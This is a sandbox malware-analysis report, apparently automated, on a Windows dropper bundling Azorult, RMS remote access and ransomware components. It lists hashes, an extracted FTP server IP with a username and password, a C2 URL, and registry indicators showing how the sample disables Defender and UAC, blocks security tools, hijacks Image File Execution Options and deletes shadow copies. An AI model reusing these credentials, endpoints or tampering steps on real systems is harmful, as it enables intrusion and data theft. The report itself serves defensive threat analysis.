azorult | 1a84776922a5c30ab54405e3cdefc984e22d4e62e3c07d813010e3965cafd939

Analysis

max time kernel
597s
max time network
608s
platform
windows10-2004_x64
resource
win10v2004-20240226-de
resource tags

arch:x64arch:x86image:win10v2004-20240226-delocale:de-deos:windows10-2004-x64systemwindows
submitted
04-04-2024 12:12

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

NameItwhatever.exe
Size

16.4MB
MD5

1b4650df1ae010317e622461ac1b9876
SHA1

f2f501b3cbad1328e20f6d01256516dab4d91019
SHA256

1a84776922a5c30ab54405e3cdefc984e22d4e62e3c07d813010e3965cafd939
SHA512

c025ef8dc10ab8ba4992348294b5d54a6c637aa55e9a899a09118e913d0f5e6c9993e8dca0e982052dbf4afdd0f261dc42852d9e22cc18695e4a2a3a44a160a8
SSDEEP

393216:no9Ddnnx89uxfH7h2Jp5M/urEUWjPCEhM1tv1PYro5NWjjvKda:o9ZnxGul7hNdbqh1x1KuejvKda

Score

10^/10

azorult rms discovery evasion infostealer persistence ransomware rat trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.81
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://boglogov.site/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Modifies WinLogon for persistence 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\Annabelle.exe"	Annabelle.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 20 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Annabelle.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

UAC bypass 3 TTPs 10 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe

Disables RegEdit via registry modification 10 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 28 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1432	netsh.exe
4992	NetSh.exe
5440	netsh.exe
5836	netsh.exe
1832	netsh.exe
5684	netsh.exe
4696	netsh.exe
5176	netsh.exe
5620	netsh.exe
2800	netsh.exe
5348	netsh.exe
4048	netsh.exe
5004	netsh.exe
3428	netsh.exe
3584	NetSh.exe
2780	NetSh.exe
6052	NetSh.exe
1172	netsh.exe
1324	netsh.exe
2672	netsh.exe
4576	netsh.exe
3284	netsh.exe
5720	netsh.exe
1492	NetSh.exe
3436	netsh.exe
5112	netsh.exe
3432	netsh.exe
2868	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file execution options in registry 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmplayer.exe	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\recoverydrive.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yandex.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemexplorer.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gpedit.msc\Debugger = "RIP"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cabinet.dll	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cabinet.dll\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logoff.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspaint.exe\Debugger = "RIP"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rasman.dll\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mydocs.dll\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "RIP"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemexplorer.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoftedge.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "RIP"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Autoruns.exe	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\url.dll\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoftedgecp.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gpedit.msc\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usbui.dll\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\Debugger = "RIP"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webcheck.dll	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DBGHELP.exe\Debugger = "RIP"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chkdsk.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logoff.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmplayer.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger = "RIP"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspaint.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Autoruns.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webcheck.dll\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mydocs.dll\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger = "RIP"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DBGHELP.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\recoverydrive.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chkdsk.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DBGHELP.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DCIMAN32.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger = "RIP"	Annabelle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger = "RIP"	Annabelle.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1816	attrib.exe
1796	attrib.exe
5560	attrib.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	Annabelle.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	winlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	Azorult.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	Annabelle.exe

Executes dropped EXE 34 IoCs

pid	Process
4684	Azorult.exe
5808	Azorult.exe
1924	wini.exe
4440	winit.exe
964	rutserv.exe
3332	cheat.exe
3356	ink.exe
864	taskhost.exe
2656	rutserv.exe
5384	P.exe
5348	rutserv.exe
5100	rutserv.exe
1924	rfusclient.exe
3936	rfusclient.exe
4584	rfusclient.exe
1620	R8.exe
5580	winlog.exe
4032	winlogon.exe
5160	Rar.exe
4432	taskhostw.exe
5304	winlogon.exe
1156	RDPWInst.exe
5420	RDPWInst.exe
5784	taskhostw.exe
5808	taskhostw.exe
1104	$uckyLocker.exe
5868	$uckyLocker.exe
4752	taskhostw.exe
5876	Annabelle.exe
6036	Annabelle.exe
3976	Annabelle.exe
5344	Annabelle.exe
3512	Annabelle.exe
2772	taskhostw.exe

Loads dropped DLL 51 IoCs

pid	Process
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3132	NameItwhatever.exe
3892	svchost.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
752	icacls.exe
980	icacls.exe
5932	icacls.exe
4752	icacls.exe
6140	icacls.exe
1828	icacls.exe
